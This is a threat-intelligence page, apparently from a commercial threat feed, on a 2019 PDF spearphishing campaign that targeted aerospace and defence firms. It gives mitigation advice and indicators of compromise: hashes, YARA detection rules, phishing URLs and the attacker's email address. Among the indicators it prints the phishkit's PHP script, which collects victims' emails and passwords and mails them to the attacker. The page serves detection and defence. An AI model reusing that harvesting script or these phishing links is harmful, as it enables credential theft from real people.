Skip to main content
Threat Radar animated logo
DashboardThreatsMapFeedsPricingView Plans & Pricing
reconnecting
Press slash or control plus K to focus the search. Use the arrow keys to navigate results and press enter to open a threat.
Reconnecting to live updates…

Targeted phishing - PDF documents / phishkit

0
Low
Phishingmisp-galaxy:mitre-attack-pattern="spearphishing attachment - t1193"misp-galaxy:mitre-attack-pattern="spearphishing link - t1192"enisa:nefarious-activity-abuse="spear-phishing-attacks"type:osintosint:lifetime="perpetual"osint:certainty="50"tlp:whitetlp:cleartlp:green
Published: Thu May 16 2019 (05/16/2019, 00:00:00 UTC)
Source: CIRCL OSINT Feed
Vendor/Project: type
Product: osint

Description

Targeted phishing - PDF documents / phishkit

AI-Powered Analysis

Machine-generated threat intelligence

AILast updated: 03/06/2026, 21:57:59 UTC

Technical Analysis

The threat described is a targeted phishing campaign utilizing PDF documents as the primary vector for delivering malicious content or links, often packaged within phishkits. Phishkits are pre-built toolkits that enable attackers to craft convincing phishing campaigns efficiently. This campaign aligns with MITRE ATT&CK techniques T1193 (Spearphishing Attachment) and T1192 (Spearphishing Link), indicating attackers send emails with malicious PDF attachments or embedded links designed to deceive recipients into opening them. Upon interaction, victims may be led to credential harvesting sites, malware downloads, or other malicious outcomes. The campaign is identified through OSINT sources, specifically the CIRCL OSINT feed, with a moderate certainty level (50%). There are no specific software vulnerabilities or patches associated, and no known exploits in the wild have been reported, suggesting this is primarily a social engineering threat rather than a technical exploit. The threat persists perpetually due to the ongoing effectiveness of phishing tactics. The lack of detailed technical indicators or affected versions limits the ability to attribute or detect via signatures, emphasizing the need for behavioral and heuristic detection methods. The threat is tagged with multiple TLP levels (white, clear, green), indicating broad sharing permissions and relevance to multiple audiences. Overall, this threat represents a common but persistent phishing vector leveraging PDF documents to target individuals or organizations selectively.

Potential Impact

The primary impact of this threat is the potential compromise of user credentials, unauthorized access to sensitive systems, and possible deployment of malware if the phishing attempt succeeds. Organizations may face data breaches, financial loss, reputational damage, and operational disruption. Since the attack relies on social engineering, the success rate depends heavily on user awareness and email security controls. The absence of known technical exploits reduces the risk of widespread automated compromise but does not diminish the threat to high-value targets susceptible to spearphishing. The use of PDF documents can bypass some traditional email filters if not properly configured, increasing the chance of delivery. The impact is global, affecting any organization or individual relying on email communications and PDF workflows, particularly in sectors like finance, government, healthcare, and critical infrastructure where targeted phishing is prevalent.

Mitigation Recommendations

To mitigate this threat effectively, organizations should implement advanced email filtering solutions capable of inspecting PDF attachments for malicious content and embedded links. Deploy sandboxing technologies to analyze suspicious PDFs in a controlled environment before delivery. Enhance user training programs focused on recognizing spearphishing attempts, especially those involving document attachments. Enforce multi-factor authentication (MFA) to reduce the risk of credential compromise leading to unauthorized access. Regularly update and patch email clients and PDF readers to minimize exploitation of any underlying vulnerabilities. Implement domain-based message authentication, reporting, and conformance (DMARC), SPF, and DKIM to reduce email spoofing. Monitor network traffic for unusual outbound connections that may indicate successful phishing exploitation. Establish incident response plans specifically addressing phishing incidents to enable rapid containment and remediation. Finally, leverage threat intelligence feeds to stay informed about emerging phishing campaigns and tactics.

Affected Countries

United StatesUnited States
United KingdomUnited Kingdom
GermanyGermany
FranceFrance
CanadaCanada
AustraliaAustralia
JapanJapan
South KoreaSouth Korea
IndiaIndia
BrazilBrazil
Pro Console: star threats, build custom feeds, automate alerts via Slack, email & webhooks.Upgrade to Pro

Technical Details

Uuid
5cdd3938-7134-4908-9552-173cc0a8016e
Original Timestamp
1764973857

Indicators of Compromise

Yara

ValueDescriptionCopy
yararule PDF_LIFT { strings: $a = "Rect[ 195.05 428.59 411.79 489.67]" condition: all of them }
yararule PDF_JAT_AUTHOR { strings: $a = "<</Author(JAT)" condition: all of them }
Generic yara rule to find the common JAT author.

Email

ValueDescriptionCopy
emailjatboss6@gmail.com
Email used to send credentials (found in the sendmail.php file)

Url

ValueDescriptionCopy
urlhttps://lulufabllc.com/doc/cdnrg.com/index.php
Phishing links
urlhttps://helpersserer.com/wp-inc/Response/www.tenova.com/index.php
Phishing links
urlhttps://www.arbutusroutes.com/document/standardaero.com/
Phishing links
urlhttps://www.arbutusroutes.com/document/utc.com/
Phishing links
urlhttps://www.arbutusroutes.com/document/gd.com/
Phishing links
urlhttps://www.arbutusroutes.com/document/airbus.com/
Phishing links
urlhttp://office.online-drive.ml/push-doc/cproduct_brochure_fg.php
Older phishing link where the login page was mirror in Wed, 12 Sep 2018 06:29:39 GMT
urlhttps://drpianotellsall.com/atkinspiano.com/wwwwww/sma/index.php
Phishing links
urlhttps://arbutusroutes.com/ssl/akhurst.com/index.php
Phishing links

Target org

ValueDescriptionCopy
target-orgairbus.com
target-orgtenova.com
target-orgstandardaero.com
target-orggd.com
target-orgutc.com
target-orgcdnrg.com
target-orgakhurst.com

File

ValueDescriptionCopy
file28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02
file56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936
fileddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73
file0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132
filec052025b442995f04a68b1b6b2007c36dbf47448c08dc249219a7f3eebd369c2
filef2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a
fileNew-Updated-docs.zip
filesendmail.php

Size in-bytes

ValueDescriptionCopy
size-in-bytes293456
size-in-bytes283714
size-in-bytes252891
size-in-bytes447466
size-in-bytes156088
size-in-bytes485888
size-in-bytes3525231

Float

ValueDescriptionCopy
float7.9916395623958
float7.9880939695683
float7.9916147992407
float7.991595563552
float7.9280918012902
float7.9068746522467

Hash

ValueDescriptionCopy
hash9a58b7f8ba04c32c027126379456e444
hashb49d7b503f9e1cd1a22a4933fb1f1a1e0b56f214
hash28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02
hash1717448f733024fcb9ea6d591115fb852fd59179c071939a3b1fe8ffb93985925646fb813a2d5828613d0c4494f1ffa3a04182569154fe42fbea1d9e9f5fd27f
hash164db8d1fe5f2ea9dd3ea826b2f0b808
hash890efaa698f4d43aad15c3dbacb6c01544fd3e27
hash56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936
hash27c965d92b452d564917e5101cdd3c254347bf919c84be76b666335425e6673cb4a2553421b13841aaeafbf9a9e25ef37369b3d2a5bee208b4259da9053c1bb3
hash08b49fb9882bfc8f69beb594fa543c8a
hash201e85d6bc519ecc6dece75b2586e761a56db6a7
hashddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73
hashb4a446c95e7239a3e491ee38e77ce8e1e96c27ca9c1cc25ca941643f366c62f81eb9942a1d80304bfc321c24cef86288f315bf97eb5f3738ad3618fbb6c86eb8
hash1baa024f9cfab48b92c297aa406c91b5
hash7d5a1dc90d535e3cc552d0db02841d28fb1ae773
hash0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132
hash4137bd777e8167e964d3ebae98720cbf532cc0afac726522a668949dbc841150aa4aa600813142bb9ec6f999bd97ddd07b9bdf885034699305381382cfba6416
hashda877f4f7335264b03ac72fca5b305dc
hash435aa871cdd772072390d9baceaa8d832208d710
hashc052025b442995f04a68b1b6b2007c36dbf47448c08dc249219a7f3eebd369c2
hash6ff7cb6507259bc322a8d400c34060d17e33483dab5b035d519447b2756a49da236acc54a413227168d7926ce758dfb169c8d92d58d2cc9b0c81cb6de383a1fd
hashb830fd2997e1f124f34d77ff1fa9b89e
hashea43350c37e0c266c12d0fd53643cf94dd58c1f7
hashf2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a
hash24a7f8c2e5d774554c69113b4b81a9755113db1ac620e0d9f0339919a0982e7c169446cb0fe4f3a9232f757a9ccd82676f55207cc044033e3485d1f22d965de1
hashb7245bf657e792328aaacbc6f75d1555
hashbc32ff3213011db8278bfcd21b1dc432ded499d3
hash9c4f9755fc183f6ad4ad4d600a0a3ed9230900152245f924b9106202ce543c58

Malware sample

ValueDescriptionCopy
malware-sample28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02|9a58b7f8ba04c32c027126379456e444
malware-sample56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936|164db8d1fe5f2ea9dd3ea826b2f0b808
malware-sampleddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73|08b49fb9882bfc8f69beb594fa543c8a
malware-sample0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132|1baa024f9cfab48b92c297aa406c91b5
malware-samplec052025b442995f04a68b1b6b2007c36dbf47448c08dc249219a7f3eebd369c2|da877f4f7335264b03ac72fca5b305dc
malware-samplef2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a|b830fd2997e1f124f34d77ff1fa9b89e
malware-sampleNew-Updated-docs.zip|b7245bf657e792328aaacbc6f75d1555

Mime type

ValueDescriptionCopy
mime-typePDF document, version 1.5
mime-typePDF document, version 1.5
mime-typePDF document, version 1.5
mime-typePDF document, version 1.5
mime-typePDF document, version 1.7
mime-typeCDFV2 Microsoft Outlook Message

Ssdeep

ValueDescriptionCopy
ssdeep6144:NsxJx6kEIUqWBT/jUcoXxC24MgppaAa2XFVzCCr1OHNw+4je6iMllP:Nsx/M3TLxer4M2sAa2VVpr1OH9Oe6HlJ
ssdeep6144:xaYsXXzUbbQ+6K4R44u+aUg031qLD0AjJ1sGBIK/:xaTXX+iKO1u5uzK/
ssdeep6144:mc67OzUcoXxC24wOOLDbjRC4xzE7mkHNw+4je6iMllT:mcNzxer4fiDbjRhGDH9Oe6Hl1
ssdeep12288:Jn4ijMb7m7MUeGApKWxw1RFn/68R4V6Sp22leUWd3FM:Jn4iQUwQDkp6hdVM
ssdeep3072:zr3i3ArGdqMW/5DsvvqTfAL3LKhMbgfGSL2YxPfmXfj:H3i3ASXQgvSA/K7XiYxG7
ssdeep12288:Yn4ijMb7m7MUeGApKWxw1RFn/68R4V6Sp22leUWd3F:Yn4iQUwQDkp6hdV

Text

ValueDescriptionCopy
textAdobe-Standard-Encoding
textMalicious
textSuspect
textJATBOSS
text<?php if(isset($_SERVER['HTTP_X_REAL_IP'])){ $ip = $_SERVER['HTTP_X_REAL_IP']; }else{ $ip=$_SERVER['REMOTE_ADDR']; } $message .= "|----------| E M A I L |--------------|\n"; $message .= "Online: ".$_POST['email']."\n"; $message .= "pass: ".$_POST['pwd']."\n"; $message .= "|--------------- I N F O | I P -------------------|\n"; $message .= "|Client IP: ".$ip."\n"; $message .= "|--- http://www.geoiptool.com/?IP=$ip ----\n"; $message .= "User Agent : ".$useragent."\n"; $message .= "|----------- HACKED BY JATBOSS --------------|\n"; $send = "jatboss6@gmail.com"; $subject = "$country | $ip"; { mail("$send", "$subject", $message); } ?>
textPHP
textMalicious
text1/56
text0/58
text2/59
text1/54
text10/61
text1/60
text0/58

Gender

ValueDescriptionCopy
genderPrefer not to say

Datetime

ValueDescriptionCopy
datetime2019-05-16T08:54:33
datetime2019-05-13T02:37:30
datetime2019-05-13T02:37:43
datetime2019-05-15T17:45:13
datetime2019-05-16T09:42:04
datetime2019-05-15T20:41:35
datetime2019-05-13T02:37:29

Link

ValueDescriptionCopy
linkhttps://www.virustotal.com/file/f2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a/analysis/1557996873/
linkhttps://www.virustotal.com/file/56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936/analysis/1557715050/
linkhttps://www.virustotal.com/file/28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02/analysis/1557715063/
linkhttps://www.virustotal.com/file/0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132/analysis/1557942313/
linkhttps://www.virustotal.com/file/9c4f9755fc183f6ad4ad4d600a0a3ed9230900152245f924b9106202ce543c58/analysis/1557999724/
linkhttps://www.virustotal.com/file/c052025b442995f04a68b1b6b2007c36dbf47448c08dc249219a7f3eebd369c2/analysis/1557952895/
linkhttps://www.virustotal.com/file/ddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73/analysis/1557715049/

Threat ID: 6933b2702271496a0fa16ea3

Added to database: 12/6/2025, 4:34:56 AM

Last enriched: 3/6/2026, 9:57:59 PM

Last updated: 3/24/2026, 5:04:25 AM

Views: 139

Community Reviews

0 reviews

Crowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.

Sort by
Loading community insights…

Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.

Actions

PRO

Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.

Please log in to the Console to use AI analysis features.

External Links

Search on Google

Need more coverage?

Upgrade to Pro Console for AI refresh and higher limits.

For incident response and remediation, OffSeq services can help resolve threats faster.

Latest Threats

Breach by OffSeqOFFSEQFRIENDS — 25% OFF

Check if your credentials are on the dark web

Instant breach scanning across billions of leaked records. Free tier available.

Scan now
OffSeq TrainingCredly Certified

Lead Pen Test Professional

Technical5-day eLearningPECB Accredited
View courses